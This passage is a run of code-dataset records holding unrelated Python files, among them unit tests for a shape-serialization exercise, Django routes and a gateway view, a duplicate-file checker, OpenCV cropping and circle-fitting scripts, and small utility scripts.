'y': 5, 'width': 4, 'id': 12, 'height': 3}]\n self.assertEqual(len(Base.to_json_string(d)), len(str(d)))\n d = [{\"Tabitha\": 98}]\n self.assertEqual(Base.to_json_string(d), '[{\"Tabitha\": 98}]')\n d = [{\"Tabitha\": 98}, {\"cat\": 5}, {\"HI\": 0}]\n self.assertEqual(Base.to_json_string(d),\n '[{\"Tabitha\": 98}, {\"cat\": 5}, {\"HI\": 0}]')\n d = [{}]\n self.assertEqual(Base.to_json_string(d), '[{}]')\n d = [{}, {}]\n self.assertEqual(Base.to_json_string(d), '[{}, {}]')\n\n r1 = Rectangle(1, 2, 3, 4)\n dictionary = r1.to_dictionary()\n json_dict = Base.to_json_string([dictionary])\n dictionary = str([dictionary])\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dict)\n\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(1, 2, 3, 4)\n r3 = Rectangle(2, 3, 4, 5)\n dictionary = [r1.to_dictionary(), r2.to_dictionary(),\n r3.to_dictionary()]\n json_dictionary = Base.to_json_string(dictionary)\n dictionary = str(dictionary)\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n r1 = Square(10, 7, 2)\n dictionary = r1.to_dictionary()\n json_dictionary = Base.to_json_string([dictionary])\n dictionary = str([dictionary])\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n r1 = Square(10, 7, 2)\n r2 = Square(1, 2, 3)\n r3 = Square(2, 3, 4)\n dictionary = [r1.to_dictionary(), r2.to_dictionary(),\n r3.to_dictionary()]\n json_dictionary = Base.to_json_string(dictionary)\n dictionary = str(dictionary)\n dictionary = dictionary.replace(\"'\", '\"')\n self.assertEqual(dictionary, json_dictionary)\n\n # -- #16 -- #\n def test_save_to_file(self):\n \"\"\" Tests save_to_file method \"\"\"\n import os\n r1 = Rectangle(15, 4, 3, 2)\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r1, r2])\n\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 105)\n\n Rectangle.save_to_file(None)\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n try:\n os.remove(\"Rectangle.json\")\n except:\n pass\n Rectangle.save_to_file([])\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n r2 = Rectangle(2, 4)\n Rectangle.save_to_file([r2])\n with open(\"Rectangle.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 52)\n\n Square.save_to_file(None)\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n try:\n os.remove(\"Square.json\")\n except:\n pass\n Square.save_to_file([])\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(file.read(), \"[]\")\n\n r2 = Square(1)\n Square.save_to_file([r2])\n with open(\"Square.json\", \"r\") as file:\n self.assertEqual(len(file.read()), 38)\n\n # -- #17 -- #\n\n def test_create(self):\n '''Tests create() method.'''\n r1 = Rectangle(3, 5, 1)\n r1_dictionary = r1.to_dictionary()\n r2 = Rectangle.create(**r1_dictionary)\n self.assertEqual(str(r1), str(r2))\n self.assertFalse(r1 is r2)\n self.assertFalse(r1 == r2)\n\n # -- 17 -- #\n def test_load_from_file(self):\n '''Tests load_from_file() method.'''\n r1 = Rectangle(10, 7, 2, 8)\n r2 = Rectangle(2, 4)\n list_in = [r1, r2]\n Rectangle.save_to_file(list_in)\n list_out = Rectangle.load_from_file()\n self.assertNotEqual(id(list_in[0]), id(list_out[0]))\n self.assertEqual(str(list_in[0]), str(list_out[0]))\n self.assertNotEqual(id(list_in[1]), id(list_out[1]))\n self.assertEqual(str(list_in[1]), str(list_out[1]))\n\n s1 = Square(5)\n s2 = Square(7, 9, 1)\n list_in = [s1, 
s2]\n Square.save_to_file(list_in)\n list_out = Square.load_from_file()\n self.assertNotEqual(id(list_in[0]), id(list_out[0]))\n self.assertEqual(str(list_in[0]), str(list_out[0]))\n self.assertNotEqual(id(list_in[1]), id(list_out[1]))\n self.assertEqual(str(list_in[1]), str(list_out[1]))\n\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468809160","text":"from django.urls import path\nfrom . import views\n\napp_name = 'movies'\n\nurlpatterns = [\n path('', views.index),\n path('top10/', views.top10),\n path('/', views.recommended),\n path('detail//', views.detail),\n path('hashtag//', views.get_movies),\n path('hashtags//', views.hashtags),\n path('genres/', views.get_genres),\n path('genre//', views.genre),\n path('/like/', views.like),\n path('/reviews/', views.get_reviews),\n path('/review/', views.review),\n path('sorts/', views.sorts),\n path('sort///', views.sort)\n]\n","sub_path":"movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"23399057","text":"import h5py\nimport numpy as np\nhdf5_path = 'D:\\ImageProcessingPythonScripts\\Training\\Evaluator\\ValidationSets3\\ValidationSet03_DualBlur1.hdf5'\nhdf5_file = h5py.File(hdf5_path, \"r\")\n\ndata_num = hdf5_file[\"val_int_img\"].shape[0]\nprint(data_num)\nfrom random import shuffle\nfrom math import ceil\nimport matplotlib.pyplot as plt\n\nbatch_size = 1\nbatches_list = list(range(int(ceil(float(data_num) / batch_size))))\nshuffle(batches_list)\nfor n, i in enumerate(batches_list):\n i_s = i * batch_size # index of the first image in this batch\n i_e = min([(i + 1) * batch_size, data_num])\n images_ext = hdf5_file[\"val_ext_img\"][i_s:i_e, ...]\n images_int = hdf5_file[\"val_int_img\"][i_s:i_e, ...]\n labels = hdf5_file[\"val_labels\"][i_s:i_e, ...]\n names = hdf5_file[\"val_names\"][i_s:i_e, ...]\n print(labels[0])\n print(names[0])\n plt.imshow(images_int[0])\n plt.show()\n plt.imshow(images_ext[0])\n plt.show()\n","sub_path":"ImageCropping_DatabaseCreation/hdf5_read.py","file_name":"hdf5_read.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27335793","text":"# Create your views here.\nfrom datetime import datetime\nfrom functools import reduce\n\nfrom django.http import HttpResponse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom gateway.models import API\n\n\nclass MainGatewayView(APIView):\n\n def redirect(self, request):\n paths = request.path.split('/')\n if len(paths) < 2 or paths[1] != \"api\":\n raise ValidationError('incorrect path format')\n api = API.objects.filter(name=paths[2])\n if api.count() != 1:\n raise ValidationError('multiple api found for this service name')\n api = api[0]\n if api.failure_strike >= 3:\n now = datetime.now()\n if (api.recent_failure_time - now).total_seconds() < 30:\n return Response('service unavailable', status=503)\n api.failure_strike = 0\n api.save()\n print(paths, reduce(lambda a, b: f'{str(a)}/{str(b)}', paths[3:]))\n\n res = api.send_request(request, reduce(lambda a, b: f'{str(a)}/{str(b)}', paths[3:]))\n if res == -1:\n return Response('service unavailable', 
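The tests above pin down the behaviour of Base.to_json_string() and save_to_file(). A minimal sketch consistent with those assertions, not the project's actual implementation (which is not shown here; Rectangle and Square would supply to_dictionary()):

import json


class Base:
    __nb_objects = 0

    def __init__(self, id=None):
        if id is not None:
            self.id = id
        else:
            Base.__nb_objects += 1
            self.id = Base.__nb_objects

    @staticmethod
    def to_json_string(list_dictionaries):
        # None and [] both serialize to the empty JSON list.
        if not list_dictionaries:
            return "[]"
        return json.dumps(list_dictionaries)

    @classmethod
    def save_to_file(cls, list_objs):
        list_objs = list_objs or []
        with open(cls.__name__ + ".json", "w") as f:
            f.write(cls.to_json_string([o.to_dictionary() for o in list_objs]))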
status=503)\n if res.headers.get('Content-Type', '').lower() == 'application/json':\n data = res.json()\n else:\n data = res.content\n return Response(data, status=res.status_code)\n\n def get(self, request):\n return self.redirect(request)\n\n def post(self, request):\n return self.redirect(request)\n\n def put(self, request):\n return self.redirect(request)\n","sub_path":"gateway/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238982340","text":"import hashlib\nimport os\nimport stat\nfrom queue import Queue\nfrom threading import RLock, Thread\n\n\ndef clean_path(path):\n if not os.path.exists(path):\n raise FileNotFoundError(\"{} not found\".format(path))\n path = os.path.expanduser(path)\n path = os.path.normpath(path)\n path = os.path.abspath(path)\n return path\n\n\nclass DupeChecker(object):\n\n def __init__(self, dirname, hash_type=\"md5\", num_threads=1):\n self.queue = Queue()\n self.lock = RLock()\n dirname = clean_path(dirname)\n self._queue_dir(dirname)\n self.hasher = self._get_hasher(hash_type)\n self.num_threads = num_threads\n self.duplicates = set()\n self.checksums = {}\n\n def detect_duplicates(self):\n \"\"\"Start multiple threads which extract files to check from a queue,\n to avoid the same file being handled by multiple threads.\n \"\"\"\n for _ in range(self.num_threads):\n t = Thread(target=self._work_queue)\n t.start()\n self.queue.join()\n\n def formatted_duplicates(self):\n return \"\\n\".join(\"{}: {}\".format(h, \", \".join(self.checksums[h]))\n for h in self.duplicates)\n\n def get_duplicates(self):\n self.detect_duplicates()\n return self.formatted_duplicates()\n\n def check_file(self, fname):\n \"\"\"Check if a file is duplicate and mark the fact accordingly.\n Since the file data (checksums and duplicates) can be accessed\n concurrently by multiple threads, a simple lock is used when\n updating those members.\n \"\"\"\n s = self._checksum(fname)\n self.lock.acquire()\n try:\n if s in self.checksums:\n self.duplicates.add(s)\n self.checksums[s].add(fname)\n else:\n self.checksums[s] = {fname}\n finally:\n self.lock.release()\n\n def _queue_dir(self, dirname):\n \"\"\"Enqueue all regular files within a directory.\n This method also recurses on subdirectories.\n \"\"\"\n root = os.path.abspath(dirname)\n for name in os.listdir(dirname):\n fname = os.path.join(root, name)\n mode = os.stat(fname).st_mode\n if stat.S_ISREG(mode):\n self.queue.put(fname)\n elif stat.S_ISDIR(mode):\n self._queue_dir(fname)\n\n def _work_queue(self):\n while not self.queue.empty():\n fname = self.queue.get()\n self.check_file(fname)\n self.queue.task_done()\n\n def _get_hasher(self, hname):\n if hname == 'md5':\n return hashlib.md5\n elif hname == 'sha1':\n return hashlib.sha1\n elif hname == 'sha256':\n return hashlib.sha256\n else:\n raise ValueError(\"{} hashing is not supported.\".format(hname))\n\n def _checksum(self, fname):\n \"\"\"Compute the checksum of a file by reading it in chunks,\n to avoid loading large files in memory.\n \"\"\"\n hasher = self.hasher()\n with open(fname, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b\"\"):\n hasher.update(chunk)\n return hasher.hexdigest()\n","sub_path":"dupefinder/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141064035","text":"# -*- coding: utf-8 
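DupeChecker above is self-contained; a minimal usage sketch follows (the directory path is illustrative). One caveat: the `while not self.queue.empty(): self.queue.get()` pattern in _work_queue() can race between workers, so `get_nowait()` guarded by `except queue.Empty` is the defensive variant.

# Scan a tree with four worker threads and SHA-256 hashing; identical
# files end up grouped under the same checksum.
checker = DupeChecker("/tmp/photos", hash_type="sha256", num_threads=4)
print(checker.get_duplicates())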
-*-\r\n\"\"\"\r\nCreated on Tue Dec 15 17:03:23 2020\r\n\r\n@author: us51114\r\ncrop the image\r\n\"\"\"\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef find_the_diff_corner(img,x_dim,y_dim,str_inp):\r\n if str_inp=='top':\r\n start_i=0;stop_i=x_dim;step_i=1\r\n start_j=0;stop_j=y_dim;step_j=1\r\n addin=-1\r\n x_var='i';y_var='j'\r\n elif str_inp=='bottom':\r\n start_i=x_dim-1;stop_i=-1;step_i=-1\r\n start_j=0;stop_j=y_dim-1;step_j=1\r\n addin=1\r\n x_var='i';y_var='j'\r\n elif str_inp=='left':\r\n start_i=0;stop_i=y_dim-1;step_i=1\r\n start_j=0;stop_j=x_dim-1;step_j=1\r\n addin=1\r\n x_var='j';y_var='i'\r\n elif str_inp=='right':\r\n start_i=y_dim-1;stop_i=-1;step_i=-1\r\n start_j=0;stop_j=x_dim-1;step_j=1\r\n addin=-1\r\n x_var='j';y_var='i'\r\n # print(start_i,\":\",stop_i,\":\",step_i)\r\n # print(start_j,\":\",stop_j,\":\",step_j)\r\n find_val=img[0,0]\r\n # print(\"find_val=\",type(find_val))\r\n for i in range(start_i,stop_i,step_i):\r\n # for j in range(start_j,stop_j,step_j):\r\n # print(type(img[eval(x_var),eval(y_var)]))\r\n if x_var=='i':\r\n cur_val=img[eval(x_var),:]\r\n else:\r\n cur_val=img[:,eval(y_var)]\r\n # cur_val=img[eval(x_var),eval(y_var)]\r\n comparison = find_val == cur_val \r\n equal_arrays = comparison.all() \r\n if ~equal_arrays:\r\n # print('find_val:',find_val,',cur_val:',cur_val)\r\n index_found=i+addin\r\n # print('index_found:',index_found,'i:',i)\r\n return index_found\r\n \r\ndef add_border(img,start_i,stop_i,cont_j,var_axis):\r\n if var_axis=='x':\r\n x_var='i';y_var='j'\r\n else:\r\n x_var='j';y_var='i'\r\n set_color=np.array([0,0,255]) #red [blue,green,red]\r\n for i in range(start_i,stop_i+1,1):\r\n # for j in range(start_j,stop_j,step_j):\r\n j=cont_j\r\n img[eval(x_var),eval(y_var)]=set_color\r\n\r\n\r\n#import image\r\n# img=cv2.imread('D:\\\\kalathi\\\\My_collection\\\\Python\\\\Auto_Crop_image\\\\Picture.jpg')\r\nimg=cv2.imread('Input_Image.jpg')\r\n#print(img.shape)\r\n#print(img[0,0])\r\nx=img.shape[0]\r\n# print(x)\r\ny=img.shape[1]\r\ntop_loc=find_the_diff_corner(img,x,y,'top')\r\n#print('top_loc=',top_loc)\r\nbot_loc=find_the_diff_corner(img,x,y,'bottom')\r\nleft_loc=find_the_diff_corner(img,x,y,'left')\r\nright_loc=find_the_diff_corner(img,x,y,'right')\r\n#print('top_loc=',top_loc,'bot_loc=',bot_loc,'left_loc=',left_loc,'right_loc=',right_loc)\r\n\r\n#below to create the red border to image\r\n# ka=add_border(img,left_loc,right_loc,top_loc,'y') #'top line'\r\n# ka=add_border(img,left_loc,right_loc,bot_loc,'y') #'bottom line'\r\n# ka=add_border(img,top_loc,bot_loc,left_loc,'x') #'left line'\r\n# ka=add_border(img,top_loc,bot_loc,right_loc,'x') #'right line'\r\n# cv2.imshow('image',img)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\ncrop_img=img[top_loc:bot_loc+1,left_loc:right_loc+1]\r\nka=cv2.imwrite('Output_Image.jpg',crop_img)\r\n","sub_path":"Auto_Crop_image.py","file_name":"Auto_Crop_image.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309458540","text":"'''\nIn this kata, you've to count lowercase letters in a given string and return the letter count in a hash with 'letter' as key and count as 'value'. 
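The row/column scanning loops in Auto_Crop_image.py can be replaced by NumPy reductions: mask every pixel that differs from the top-left background pixel and crop to the mask's bounding box. A sketch of the equivalent crop, using the same file names and assuming at least one non-background pixel exists:

import cv2
import numpy as np

img = cv2.imread('Input_Image.jpg')
# True wherever any channel differs from the top-left (background) pixel.
mask = np.any(img != img[0, 0], axis=2)
ys, xs = np.where(mask)
crop = img[ys.min():ys.max() + 1, xs.min():xs.max() + 1]
cv2.imwrite('Output_Image.jpg', crop)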
The key must be 'symbol' instead of string in Ruby and 'char' instead of string in Crystal.\n\nExample:\n\nletter_count('arithmetics') #=> {\"a\": 1, \"c\": 1, \"e\": 1, \"h\": 1, \"i\": 2, \"m\": 1, \"r\": 1, \"s\": 1, \"t\": 2}\n'''\n\n\ndef letter_count(s):\n    result = {}\n    for c in s:\n        # only lowercase letters are counted, per the kata description\n        if c.islower():\n            result[c] = result.get(c, 0) + 1\n    return result\n\n\ndef main():\n    print(letter_count(\"codewars\"))\n\n\nmain()","sub_path":"Count letters in string/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"242995457","text":"# coding=utf-8\n\"\"\"\nUseful mixins for forms\n\"\"\"\nfrom django.forms import formset_factory, BaseFormSet, BaseForm\nfrom django.forms.formsets import TOTAL_FORM_COUNT\nfrom django.utils.datastructures import MultiValueDict\n\n__author__ = 'Ilya.Kazakevich'\n\n\nclass ValidateOnlyChangedFormMixin:\n    \"\"\"\n    Validates some values only if they were changed\n    \"\"\"\n    changed_fields_validators = dict()\n    \"\"\"\n    dict \"field_name\": validator\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        for field, validator in self.__class__.changed_fields_validators.items():\n            # Bind the loop variables as defaults so each closure keeps its\n            # own field/validator pair instead of the last one from the loop.\n            def _validator(value, field=field, validator=validator):\n                if field in self.changed_data:\n                    validator(value)\n\n            if field in self.fields:  # No need to add validator if field does not exist\n                self.fields[field].validators.append(_validator)\n\n\ndef multiply_files_in_formset(file_fields, form, main_files, main_data, prefix=None):\n    \"\"\"\n    This tool helps you to support multiple file uploads. You create a formset with a form that has only a file field.\n    This file field should have the ``multiple`` attribute.\n    In your formset, you call this function in ``__init__`` *before* the real ``__init__``, passing ``files`` and ``data``\n    to it. 
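collections.Counter gives the same tally in one expression; an equivalent of the letter_count() above:

from collections import Counter

def letter_count(s):
    # Counter does the tallying; the comprehension keeps lowercase letters only.
    return {c: n for c, n in Counter(s).items() if c.islower()}

assert letter_count('arithmetics') == {'a': 1, 'c': 1, 'e': 1, 'h': 1,
                                       'i': 2, 'm': 1, 'r': 1, 's': 1, 't': 2}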
It will duplicate form creating a new form for each file (like the client would do).\n So, from Formset point of view, it will work like if client simply added new form.\n Management form is fixed as well\n :param file_fields: fields with file\n :type file_fields list of str\n :param form: model form to be used to parse\n :type form django.forms.models.ModelForm\n :param main_files: ``files`` from request (probably from ``**kwargs['files']``)\n :type main_files dict\n :param main_data: ``data`` from request (probably from ``**kwargs['data']``)\n :type main_data dict\n :param prefix: formset with files prefix\n :type prefix dict\n \"\"\"\n formset = formset_factory(form)(data=main_data, files=main_files, prefix=prefix)\n assert isinstance(formset, BaseFormSet)\n form_count = int(formset.total_form_count())\n for form_id, real_form in enumerate(formset.forms):\n for file_field in file_fields:\n assert isinstance(real_form, BaseForm)\n prefix = real_form.prefix\n try:\n files = real_form.files.getlist(\"{0}-{1}\".format(prefix, file_field))\n except AttributeError:\n continue # In case of no such attribute there is simple dict\n if len(files) < 2:\n continue\n for new_file in files[1:]: # Copy all other files except the first one that is already there\n # Only copy fields for this form\n for field_name, field_val in [(k, v) for (k, v) in real_form.data.items() if\n str(k).startswith(prefix)]:\n # Use new form id instead of old one\n new_field_name = str(field_name).replace(\"-{}-\".format(form_id), \"-{}-\".format(form_count))\n main_data[new_field_name] = field_val\n new_file_name = formset.prefix + \"-\" + str(form_count) + \"-\" + file_field\n main_files[new_file_name] = new_file\n form_count += 1\n\n # Fix management form\n main_data[formset.prefix + \"-\" + TOTAL_FORM_COUNT] = str(form_count)\n # Remove all files from first one: it will take random file in other case\n if not isinstance(main_files, MultiValueDict):\n return\n for k in main_files.keys():\n list_of_files = main_files.getlist(k)\n if isinstance(list_of_files, list) and len(list_of_files) > 1:\n del main_files[k]\n main_files.appendlist(k, list_of_files[0])\n","sub_path":"django_swissknife/forms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"144936131","text":"\"\"\"\nRobert Kuramshin\nrobert.kuramshin@gatech.edu\n\nPart 2 of digitized circles problem \n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom scipy.optimize import minimize\n\n\ndef clicked_circe(centers, click, radius):\n \"\"\"return center of the clicked circle\n\n Arguments:\n centers {tuple array} -- grid circle centers (x,y) array\n click {tuple} -- coordinates (x,y) of the click\n radius {integer} -- radius of grid circles\n\n Returns:\n typle -- coordinates of clicked circle (x,y)\n \"\"\"\n\n # iterate through all circles until we find within a radius distance of click\n for center in centers:\n if dist(center, click) <= radius:\n return center\n return None\n\n\ndef circle_intersects(centers, radius, drawn_center, drawn_radius):\n \"\"\"Find the centers of circles that are intersected by given circle\n\n Arguments:\n centers {tuple array} -- list of centers (x,y) for points to be checked\n radius {integer} -- radius of the given circles\n drawn_center {tuple} -- center coordinates (x,y) of given circle\n drawn_radius {integer} -- radius of the given circle\n\n Returns:\n tuple array -- center coordinates (x,y) of from 
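A hypothetical view showing how multiply_files_in_formset() might be wired up; the form class, field name, and prefix below are illustrative, not taken from the source:

from django.forms import Form, FileField, formset_factory

class AttachmentForm(Form):  # hypothetical single-file form
    attachment = FileField()

def handle_upload(request):
    data = request.POST.copy()
    files = request.FILES.copy()
    # Fan one multiple-file input out into one form per file before the
    # formset parses the payload; the management form is fixed up inside.
    multiply_files_in_formset(['attachment'], AttachmentForm,
                              files, data, prefix='att')
    formset = formset_factory(AttachmentForm)(data=data, files=files,
                                              prefix='att')
    if formset.is_valid():
        ...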
centers array that intersect the given circle\n \"\"\"\n intersects = [] # list of intersected circle centers\n\n # iterate through circle center array and compare distance to given circle\n for center in centers:\n d = dist(center, drawn_center) # euclidean distance\n\n # if the edge of drawn circle falls inside the grid circle\n if(d <= radius+drawn_radius and d >= drawn_radius-radius):\n intersects.append(center)\n return intersects\n\n\ndef error_fun(args):\n \"\"\"Error function to be minimized\n\n Arguments:\n args {tuple} -- argument list (x,y,radius) describing circle\n\n Returns:\n integer -- error\n \"\"\"\n global clicked_arr\n global c_radius\n\n # unpack argument\n x, y, radius = int(args[0]), int(args[1]), int(args[2])\n\n # determine the number of intersected circles\n n = len(circle_intersects(clicked_arr, c_radius, (x, y), radius))\n\n # return number of circles selected but not intersected\n return (len(clicked_arr)-n)\n\n\ndef get_centroid(centers):\n \"\"\"Compute centroid of an list of circle centers\n\n Arguments:\n centers {tuple array} -- list of circles to be used\n\n Returns:\n tuple -- coordinates (x,y) of centroid\n \"\"\"\n\n # return None if centers array is empty\n if(len(centers) == 0):\n return None\n\n x = 0 # total x coordinates\n y = 0 # total y coordinates\n\n # iterate over circle centers and compute total\n for center in centers:\n x += center[0]\n y += center[1]\n\n # divide by number of samples\n x /= len(centers)\n y /= len(centers)\n\n return (int(x), int(y))\n\n\ndef avg_distance(centers, point):\n \"\"\"Find average distance from a point to a list of circle centers\n\n Arguments:\n centers {tuple array} -- list of circles to be used\n point {tuple} -- coordinate (x,y) of point to reference\n\n Returns:\n integer -- average distance\n \"\"\"\n\n d = 0 # total distance\n\n # compute and total distance from every circle center to point\n for center in centers:\n d += dist(center, point) # use euclidean distance\n\n # divide by number of samples\n d /= len(centers)\n\n return int(d)\n\n\ndef dist(a, b):\n \"\"\"Compute euclidean distance between two coordinate pairs\n\n Arguments:\n a {tuple} -- (x,y) coordinates of point one\n b {tuple} -- (x,y) coordinates of point two\n\n Returns:\n float -- distance between two points\n \"\"\"\n return np.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)\n\n\ndef mouse_handler(event, x, y, flags, data):\n \"\"\"Mouse event handler\n\n Arguments:\n x {integer} -- x coordinate component of event location\n y {integer} -- y coordinate component of event location\n data {numpy array} -- cv2 image passed to handler\n \"\"\"\n global btn_down\n global background\n global grid_circle_centers\n global c_radius\n global clicked_arr\n global generate\n global image\n\n # mouse button release\n if event == cv2.EVENT_LBUTTONUP and btn_down:\n btn_down = False\n\n # if pressed inside generate button\n if(x > generate_x and y > generate_y):\n # compute centroid of selected grid circles\n centroid = get_centroid(clicked_arr)\n\n # return if no circles selected\n if(centroid is None):\n return\n\n generate = True # used to reset image once new circles are selected\n\n # average distance to all points used as radius guess\n avg_dist = avg_distance(clicked_arr, centroid)\n\n # use centroid and avg_dist as initial guesses for minimization function\n guess = (centroid[0], centroid[1], avg_dist)\n\n cv2.circle(image, centroid, avg_dist, (0, 0, 255), 1) # draw guess\n\n m = minimize(error_fun, guess, method=\"Nelder-Mead\").x # minimize\n\n # 
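With the grid centers held in an (N, 2) array, the per-circle loop in circle_intersects() vectorizes into a single annulus test; a sketch under that assumption:

import numpy as np

def circle_intersects_np(centers, radius, drawn_center, drawn_radius):
    centers = np.asarray(centers, dtype=float)  # shape (N, 2)
    d = np.hypot(*(centers - drawn_center).T)   # distance to each grid center
    # The drawn circle's edge crosses a grid circle iff that center lies in
    # the annulus [drawn_radius - radius, drawn_radius + radius].
    hit = (d <= drawn_radius + radius) & (d >= drawn_radius - radius)
    return centers[hit]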
draw minimized circle and show\n cv2.circle(image, (int(m[0]), int(m[1])),\n int(m[2]), (255, 0, 0), 1)\n cv2.imshow(\"Part 2\", image)\n\n # find clicked circle if any\n clicked = clicked_circe(grid_circle_centers, (x, y), c_radius)\n\n if clicked:\n # add clicked circle to list of selected circles\n clicked_arr.append(clicked)\n # change color of selected circle and draw\n cv2.circle(image, clicked, c_radius, (255, 0, 0), -1)\n cv2.imshow(\"Part 2\", image)\n\n # mouse button pressed\n elif event == cv2.EVENT_LBUTTONDOWN:\n btn_down = True\n\n # circle has been generate and new points are selected\n if generate:\n image = background.copy() # reset background\n generate = False\n clicked_arr = [] # reset list of selcted points\n cv2.imshow(\"Part 2\", background) # draw\n\n\nbtn_down = False # mouse clicked\ngenerate = False # circle has been generated\nclicked_arr = [] # array of selected grid circles\n\n# generate button location\ngenerate_x = 720\ngenerate_y = 780\n\n# image dimensions\nimage_height = 800\nimage_width = 800\n\n# grid parameters\nn_dots_h = 20\nn_dots_v = 20\n\n# grid circle size\nc_radius = 10\n\n# create white image\nbackground = 255 * np.ones((image_height, image_width, 3), np.uint8)\n\n# calculate horizontal and vertical distances between grid circles\nh_offset = int(image_height/(n_dots_h+1))\nv_offset = int(image_width/(n_dots_v+1))\n\n# array of grid circle centers\ngrid_circle_centers = []\n\n# iteratively draw grid circles and populate grid_circle_centers\nfor i in range(1, n_dots_h+1):\n for j in range(1, n_dots_v+1):\n grid_circle_centers.append((i*h_offset, j*v_offset))\n cv2.circle(background, (i*h_offset, j*v_offset),\n c_radius, (100, 100, 100), -1)\n\n# Draw generate button\ncv2.rectangle(background, (generate_x, generate_y),\n (800, 800), (0, 255, 0), -1)\n\n# Keep global copy of background for resetting the screen\nimage = background.copy()\n\n# draw and start callback\ncv2.imshow(\"Part 2\", image)\ncv2.setMouseCallback(\"Part 2\", mouse_handler, image)\ncv2.waitKey(0)\n","sub_path":"part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289131976","text":"predictions = [2, 2, 3, 3, 3, 4, 2, 2, 3, 1, 4, 1, 3, 1, 2, 1, 2, 1, 4, 4]\ntruths = [3, 3, 1, 1, 1, 4, 3, 3, 4, 2, 4, 2, 1, 2, 3, 2, 1, 2, 4, 4]\n\nassert(len(predictions) == len(truths))\n\ntp = 0\nfp = 0\ntn = 0\nfn = 0\n\n# For every tuple\nfor i in range(len(predictions)):\n for j in range(len(truths)):\n if j <= i:\n continue\n else:\n # Same class, same cluster\n if truths[i] == truths[j] and predictions[i] == predictions[j]:\n tp += 1\n # Different class, same cluster\n elif truths[i] != truths[j] and predictions[i] == predictions[j]:\n fp += 1\n # Same class, different cluster\n elif truths[i] == truths[j] and predictions[i] != predictions[j]:\n fn += 1\n # Different class, different cluster\n elif truths[i] != truths[j] and predictions[i] != predictions[j]:\n tn += 1\n\nprint(\"TP: \", tp)\nprint(\"FP: \", fp)\nprint(\"TN: \", tn)\nprint(\"FN: \", fn)\nprint(\"Total: \", tp+fp+tn+fn)","sub_path":"hw4/CS145_HW3_Release_Python3/precision.py","file_name":"precision.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568549036","text":"#!/usr/bin/env python3\n\nfrom datetime import date, timedelta\n\n\nTEAM = (\n # Week 0.\n 'Casey',\n 'Eduardo',\n 'Allan',\n 'JC',\n 
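The four pair counts printed above translate directly into the standard external clustering measures; a short continuation using the same variables:

# Pairwise precision/recall, F1, and the Rand index from the pair counts.
precision = tp / (tp + fp)
recall = tp / (tp + fn)
rand_index = (tp + tn) / (tp + fp + fn + tn)
f1 = 2 * precision * recall / (precision + recall)
print("Precision:", precision, "Recall:", recall,
      "Rand index:", rand_index, "F1:", f1)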
'Martin',\n    # Week 1.\n    'Brian',\n    'Ales',\n    'Fabrice',\n    'Domas',\n    'Austin',\n)\n\n\nday = date.today()\n_, weeknum, weekday = day.isocalendar()\nif weekday > 5:\n    weekday = 1\n    weeknum += 1\nindex = weekday - 1 + 5 * (weeknum % 2)\npeople = TEAM * 2\none_day = timedelta(days=1)\nsummary = [{'name': '', 'people': []} for _ in range(5)]\n\nprint('Calendar:')\nfor _ in range(14):\n    wday = day.weekday()\n    if wday < 5:\n        prefix = '* ' if wday == 0 else '  '\n        print('{}{}: {}'.format(prefix, day.strftime('%a %m-%d'), people[index]))\n        summary[wday]['people'].append(people[index])\n        summary[wday]['name'] = day.strftime('%a')\n        index += 1\n    day += one_day\n\nprint('\\nSummary:')\nfor num, day in enumerate(summary):\n    prefix = '* ' if num + 1 == weekday else '  '\n    print('{}{}: {}'.format(prefix, day['name'], ', 